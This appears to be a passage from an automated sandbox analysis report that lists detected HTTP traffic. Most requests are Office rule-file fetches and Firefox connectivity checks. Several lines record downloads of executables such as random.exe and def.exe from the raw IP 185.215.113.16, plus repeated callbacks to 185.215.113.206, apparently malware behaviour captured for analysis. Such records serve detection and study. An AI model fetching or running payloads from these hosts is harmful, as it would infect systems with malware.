Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
